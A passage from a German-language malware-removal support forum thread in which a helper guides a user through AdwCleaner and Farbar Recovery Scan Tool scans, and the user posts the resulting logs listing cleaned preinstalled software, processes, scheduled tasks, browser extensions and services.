C:\ProgramData\Package Cache\{9090800F-C7DC-4A8D-9A93-001CA1ADBF63} => erfolgreich verschoben


cosinus 05.10.2020 22:34

adwCleaner

Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei in CODE-Tags.

Samoxx 06.10.2020 01:04

Hier der Inhalt der Logdatei:
Code:

# -------------------------------
# -------------------------------
# Malwarebytes AdwCleaner 8.0.7.0
# -------------------------------
# Build:    07-22-2020
# Database: 2020-07-20.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    10-06-2020
# Duration: 00:00:02
# OS:      Windows 10 Home
# Cleaned:  7
# Failed:  0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

Deleted      Preinstalled.LenovoIMController  Folder  C:\ProgramData\LENOVO\IMCONTROLLER
Deleted      Preinstalled.LenovoIMController  Folder  C:\Users\samim\AppData\Local\LENOVO\IMCONTROLLER
Deleted      Preinstalled.LenovoIMController  Folder  C:\Windows\LENOVO\IMCONTROLLER
Deleted      Preinstalled.LenovoIMController  Folder  C:\Windows\System32\Tasks\LENOVO\IMCONTROLLER
Deleted      Preinstalled.LenovoIMController  Registry  HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Lenovo Dependency Package_is1
Deleted      Preinstalled.SamsungEasyDocumentCreator  Folder  C:\Program Files (x86)\SAMSUNG\EASY DOCUMENT CREATOR
Deleted      Preinstalled.SamsungEasyDocumentCreator  Registry  HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Samsung Easy Document Creator


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [2122 octets] - [06/10/2020 01:58:49]
AdwCleaner[S01].txt - [2183 octets] - [06/10/2020 02:09:35]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########

Da sind zwei Scans im Verlauf: Ich habe unabsichtlich zwei gemacht, bei beiden kamen 7 voristallierte Software raus (keine PUPs keine Adware, etc.), ich habe einmal die voristallierte Sofware bereinigt.

cosinus 06.10.2020 08:02

adwcleaner bitte zwecks Kontrolle wiederholen

Samoxx 06.10.2020 09:38

Hier ist der Log:
Code:

# -------------------------------
# Malwarebytes AdwCleaner 8.0.7.0
# -------------------------------
# Build:    07-22-2020
# Database: 2020-09-29.1 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start:    10-06-2020
# Duration: 00:00:22
# OS:      Windows 10 Home
# Scanned:  31837
# Detected: 0


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

No Preinstalled Software found.


AdwCleaner[S00].txt - [2122 octets] - [06/10/2020 01:58:49]
AdwCleaner[S01].txt - [2183 octets] - [06/10/2020 02:09:35]
AdwCleaner[C01].txt - [2462 octets] - [06/10/2020 02:10:10]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S02].txt ##########


cosinus 06.10.2020 09:48

Ich brauche neue FRST-Logs . Haken setzen bei addition.txt dann auf Untersuchen klicken.

http://www.trojaner-board.de/picture...&pictureid=611

Samoxx 06.10.2020 10:09

Hier die FRST Untersuchung:
Code:

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 04-10-2020
durchgeführt von samim (Administrator) auf SAMIMMASCHALSLA (LENOVO 81LK) (06-10-2020 11:03:04)
Gestartet von C:\Users\samim\Downloads
Geladene Profile: samim
Platform: Windows 10 Home Version 1909 18363.1082 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Adlice -> ) C:\Program Files\RogueKiller\RogueKiller64.exe
(Adlice -> ) C:\Program Files\RogueKiller\RogueKillerSvc.exe
(Discord Inc. -> Discord Inc.) C:\Users\samim\AppData\Local\Discord\app-0.0.307\Discord.exe <6>
(Dolby Laboratories, Inc. -> ) C:\Windows\System32\dolbyaposvc\DAX3API.exe <2>
(ELAN MICROELECTRONICS CORPORATION -> ELAN Microelectronics Corp.) C:\Windows\System32\ETDCtrl.exe
(ELAN MICROELECTRONICS CORPORATION -> ELAN Microelectronics Corp.) C:\Windows\System32\ETDCtrlHelper.exe
(ELAN MICROELECTRONICS CORPORATION -> ELAN Microelectronics Corp.) C:\Windows\System32\ETDService.exe
(ELAN MICROELECTRONICS CORPORATION -> ELAN Microelectronics Corp.) C:\Windows\System32\ETDTouch.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Epic Games\Launcher\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(F.lux Software LLC -> f.lux Software LLC) C:\Users\samim\AppData\Local\FluxSoftware\Flux\flux.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dptf_cpu.inf_amd64_7ecc5be6ca7b3b0d\esif_uf.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_d52c63e0e1c02c96\jhi_service.exe
(Intel(R) Rapid Storage Technology -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_120314e52c04567c\RstMwService.exe
(Lenovo -> ) C:\Program Files\Lenovo\Lenovo Migration Assistant\Lenovo Migration Assistant Srv.exe
(Lenovo -> Lenovo Group Ltd.) C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\LenovoVantageService.exe
(LENOVO INC) C:\Program Files\WindowsApps\E0469640.LenovoUtility_3.1.18.0_x64__5grkq8ppsgwt4\VFS\ProgramFilesX64\Lenovo\LenovoUtility\utility.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\samim\AppData\Local\Microsoft\OneDrive\20.143.0716.0003\FileCoAuth.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\samim\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\usocoreworker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ActionUriServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Windows Hardware Compatibility Publisher -> Fortemedia) C:\Windows\System32\FMService64.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <7>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvlt.inf_amd64_6de98d46a9fc896b\Display.NvContainer\NVDisplay.Container.exe <2>
(Realtek Semiconductor Corp) C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.10.216.0_x64__dt26b99r8h8gj\RtkUWP.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(Samsung Electronics CO., LTD. -> ) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
(Valve -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(Valve -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(WhatsApp, Inc -> WhatsApp) C:\Users\samim\AppData\Local\WhatsApp\app-2.2039.9\WhatsApp.exe <5>
(Windscribe Limited -> Windscribe Limited) C:\Program Files (x86)\Windscribe\WindscribeService.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\ProgramData\Wondershare\Service\InstallAssistService.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\RtkAudUService64.exe [1076728 2020-03-24] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [464608 2014-09-08] (Samsung Electronics CO., LTD. -> )
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\Run: [Spotify] => C:\Users\samim\AppData\Roaming\Spotify\Spotify.exe [23318248 2020-09-06] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\Run: [Discord] => C:\Users\samim\AppData\Local\Discord\app-0.0.307\Discord.exe [91023672 2020-08-04] (Discord Inc. -> Discord Inc.)
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3395360 2020-09-04] (Valve -> Valve Corporation)
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\Run: [EpicGamesLauncher] => "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\Run: [f.lux] => C:\Users\samim\AppData\Local\FluxSoftware\Flux\flux.exe [1469968 2020-06-17] (F.lux Software LLC -> f.lux Software LLC)
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\MountPoints2: {28ef99d5-b6b6-11ea-aa75-283926e42e6a} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\MountPoints2: {f0e10172-d351-11ea-aa80-f875a4e2c190} - "E:\HiSuiteDownLoader.exe"
HKLM\...\Windows x64\Print Processors\ssm4mPC: C:\Windows\System32\spool\prtprocs\x64\ssm4mpc.dll [52088 2019-06-20] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Codename Longhorn DDK provider)
HKLM\...\Print\Monitors\ssm4m Langmon: C:\Windows\system32\ssm4mlm.dll [31096 2019-06-20] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\...\Print\Monitors\us008 Langmon: C:\Windows\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
Startup: C:\Users\samim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Epic Games Launcher.lnk [2020-05-16]
ShortcutTarget: Epic Games Launcher.lnk -> D:\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
Startup: C:\Users\samim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive - Verknüpfung.lnk [2020-10-03]
ShortcutTarget: OneDrive - Verknüpfung.lnk -> C:\Users\samim\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\samim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Twitch.lnk [2020-10-03]
ShortcutTarget: Twitch.lnk -> C:\Users\samim\AppData\Roaming\Twitch\Bin\Twitch.exe (Twitch Interactive, Inc. -> Twitch Interactive, Inc.)
Startup: C:\Users\samim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WhatsApp.lnk [2020-10-03]
ShortcutTarget: WhatsApp.lnk -> C:\Users\samim\AppData\Local\WhatsApp\WhatsApp.exe (WhatsApp, Inc -> WhatsApp)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {020760CD-8DC2-4E8F-B3FE-F3A23BE13ACB} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22764408 2020-09-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {03EC99D4-010C-48A1-9B0B-BD42F34EA908} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [913720 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {077D311A-EBCB-43F1-B075-C3FEEAF52697} - \Lenovo\ImController\TimeBasedEvents\c2661e91-8e4a-4cc5-8637-e0a13f0f51f0 -> Keine Datei <==== ACHTUNG
Task: {0DB883A5-DCDB-4E1D-B808-D142CD5F7DC5} - \Lenovo\ImController\Lenovo iM Controller Monitor -> Keine Datei <==== ACHTUNG
Task: {0ED894FF-E94F-4C5D-9C58-6849FEA0C454} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3301928 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {107E3999-622E-4273-A8EC-A8521DED723C} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {206FDB36-2535-4BA1-BAF6-749983FFF37F} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe
Task: {20973AF4-5C51-4933-A91E-8C2948DA029A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1133368 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {243D9AC4-9C36-428D-8EC3-20B830C5BECA} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\program files (x86)\microsoft visual studio\installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe [65440 2020-07-17] (Microsoft Corporation -> Microsoft)
Task: {283ABC1C-D3F2-41DF-AED5-4889C925BB84} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [145768 2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {3E8F7F64-9D1D-4916-8160-644705AF551C} - \Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask -> Keine Datei <==== ACHTUNG
Task: {3F4A36D0-2F11-4D92-A76A-10D69DC6CC22} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1133368 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6A59E285-1C9F-4363-B168-E535B19AC338} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1133368 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6CB9E372-A633-4390-8319-74A498F3D278} - System32\Tasks\Lenovo\Lenovo MigrationAssistant logon task => C:\Program Files\Lenovo\Lenovo Migration Assistant\Lenovo Migration Assistant Srv.exe [289720 2020-04-14] (Lenovo -> )
Task: {6E59386F-6AA1-4C66-A556-A8927F5B5EE5} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {706A0C8F-AF87-4EA0-BFC2-B60E7E5D3E53} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [654456 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {718E9B96-319E-47F5-9673-2CFF7C3C94CB} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [145768 2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {7486D7C7-7537-4D6C-8E8F-B13A8E85C467} - \Lenovo\ImController\TimeBasedEvents\0ee5ade8-528b-4dce-a5b7-d2e61a5e734b -> Keine Datei <==== ACHTUNG
Task: {949B621F-EF77-41F9-B429-0093C7397A2E} - System32\Tasks\EPM Preload => C:\Program Files (x86)\Samsung\Easy Printer Manager\EPM2DotNetHandler.exe [752200 2018-05-21] (HP Inc. -> )
Task: {96A670AE-D7E8-4872-8EC6-0A125C9B14B0} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22764408 2020-09-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {AF168B05-F58A-449E-9D00-A4B0B1C669AE} - \Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance -> Keine Datei <==== ACHTUNG
Task: {B133AF60-171F-4DDD-B088-7BD7F910A8FA} - \Lenovo\ImController\TimeBasedEvents\486e63ef-659a-44df-8e1c-7533e51f03f6 -> Keine Datei <==== ACHTUNG
Task: {B2D27812-B55B-4625-AF08-77758D2B3C48} - System32\Tasks\LenovoUtility Startup => C:\Windows\explorer.exe lenovo-utility://
Task: {BD75490B-6700-4F7E-92D9-99D0F09B4789} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [664784 2020-10-02] (Mozilla Corporation -> Mozilla Foundation)
Task: {CAD74088-C270-4958-A385-93278CC0B93A} - \Lenovo\ImController\TimeBasedEvents\f581897e-e444-4b3b-8ca7-edee75465123 -> Keine Datei <==== ACHTUNG
Task: {CE8B4CF9-5E6F-4BD7-BF13-8C889D6AD7AE} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [913720 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F8EE0889-0537-433F-BD0E-6FBCE1396ED7} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1133368 2020-01-10] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FBAB7261-8F7D-469A-8C26-B75DDB524256} - System32\Tasks\Lenovo\Vantage\Lenovo.Vantage.ServiceMaintainance => %systemroot%\system32\sc.exe start LenovoVantageService

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{7a035b05-7520-4b1a-a589-743a8c389de8}: [DhcpNameServer] 150.211.1.2
Tcpip\..\Interfaces\{7dce0b26-3799-4ca7-b333-e5ee0d00357d}: [DhcpNameServer] 192.168.178.1

Edge:
======
Edge Profile: C:\Users\samim\AppData\Local\Microsoft\Edge\User Data\Default [2020-10-03]

FireFox:
========
FF DefaultProfile: dtosl5m6.default
FF ProfilePath: C:\Users\samim\AppData\Roaming\Mozilla\Firefox\Profiles\dtosl5m6.default [2020-10-05]
FF ProfilePath: C:\Users\samim\AppData\Roaming\Mozilla\Firefox\Profiles\xucp045l.default-release [2020-10-06]
FF Extension: (Dark Reader) - C:\Users\samim\AppData\Roaming\Mozilla\Firefox\Profiles\xucp045l.default-release\Extensions\addon@darkreader.org.xpi [2020-09-30]
FF Extension: (Enhancer for YouTube™) - C:\Users\samim\AppData\Roaming\Mozilla\Firefox\Profiles\xucp045l.default-release\Extensions\enhancerforyoutube@maximerf.addons.mozilla.org.xpi [2020-10-04]
FF Extension: (Grammatik- und Rechtschreibprüfung - LanguageTool) - C:\Users\samim\AppData\Roaming\Mozilla\Firefox\Profiles\xucp045l.default-release\Extensions\languagetool-webextension@languagetool.org.xpi [2020-10-01]
FF Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\samim\AppData\Roaming\Mozilla\Firefox\Profiles\xucp045l.default-release\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2020-09-30]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default [2020-10-05]
CHR Notifications: Default -> hxxps://calendar.google.com; hxxps://drive.google.com; hxxps://lichess.org; hxxps://mail.google.com; hxxps://steamcommunity.com; hxxps://www.reddit.com; hxxps://www.youtube.com
CHR DefaultSearchURL: Default -> hxxps://apps.jeurissen.co/
CHR DefaultSuggestURL: Default -> hxxps://www.bing.com/osjson.aspx?FORM=U523DF&PC=U523&query={searchTerms}
CHR Extension: (ColorZilla) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhlhnicpbhignbdhedgjhgdocnmhomnp [2020-10-03]
CHR Extension: (Honey) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmnlcjabgnpnenekpadlanbbkooimhnj [2020-10-03]
CHR Extension: (Avira Password Manager) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\caljgklbbfbcjjanaijlacgncafpegll [2020-10-03]
CHR Extension: (Avira Safe Shopping) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccbpbkebodcjkknkfkpmfeciinhidaeh [2020-10-03]
CHR Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2020-10-03]
CHR Extension: (Black Menu for Google™) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\eignhdfgaldabilaaegmdfbajngjmoke [2020-10-03]
CHR Extension: (Dark Reader) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\eimadpbcbfnmbkopoojfekhnkhdbieeh [2020-10-03]
CHR Extension: (Microsoft Rewards) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbgcedjacmlbgleddnoacbnijgmiolem [2020-10-03]
CHR Extension: (Read Aloud: A Text to Speech Voice Reader) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdhinadidafjejdhmfkjgnolgimiaplp [2020-10-03]
CHR Extension: (Windscribe - Free Proxy and Ad Blocker) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnmpcagpplmpfojmgmnngilcnanddlhb [2020-10-03]
CHR Extension: (Grammarly for Chrome) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2020-10-03]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-10-03]
CHR Extension: (Grammatik- und Rechtschreibprüfung - LanguageTool) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\oldceeleldhonbafppcapldpdifcinji [2020-10-03]
CHR Extension: (vidIQ Vision for YouTube) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\pachckjkecffpdphbpmfolblodfkgbhl [2020-10-03]
CHR Extension: (Chrome Media Router) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-03]
CHR Extension: (Enhancer for YouTube™) - C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\ponfpcnoihfmfllpaingbgckeeldkhle [2020-10-03]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]

Opera:
=======
OPR Extension: (Avira Browser Safety) - C:\Users\samim\AppData\Roaming\Opera Software\Opera Stable\Extensions\dalelnnofafalcmkmnhdbigbjjkloabo [2020-05-15]
OPR Extension: (Avira Password Manager) - C:\Users\samim\AppData\Roaming\Opera Software\Opera Stable\Extensions\ngohaaocccbohaffogpbgfpmpgbcgccg [2020-05-28]
OPR Extension: (Free Avira Phantom VPN – Unblock Websites) - C:\Users\samim\AppData\Roaming\Opera Software\Opera Stable\Extensions\pcgkmkjdikhiodinhloioejnpjgmfigd [2020-05-15]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8567960 2020-05-16] (BattlEye Innovations e.K. -> )
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8838528 2020-09-04] (Microsoft Corporation -> Microsoft Corporation)
R2 DolbyDAXAPI; C:\Windows\system32\dolbyaposvc\DAX3API.exe [1926600 2019-09-01] (Dolby Laboratories, Inc. -> )
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811120 2020-05-16] (EasyAntiCheat Oy -> Epic Games, Inc)
R2 FMAPOService; C:\Windows\System32\FMService64.exe [359808 2019-08-15] (Microsoft Windows Hardware Compatibility Publisher -> Fortemedia)
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [14280 2019-12-06] (Microsoft Corporation -> Microsoft Corporation)
R2 LenovoVantageService; C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\LenovoVantageService.exe [18360 2020-07-09] (Lenovo -> Lenovo Group Ltd.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7185288 2020-09-30] (Malwarebytes Inc -> Malwarebytes)
R2 rkrtservice; C:\Program Files\RogueKiller\RogueKillerSvc.exe [13610040 2020-09-15] (Adlice -> )
S3 Rockstar Service; D:\Games\Launcher\RockstarService.exe [1676416 2020-08-01] (Rockstar Games, Inc. -> Rockstar Games)
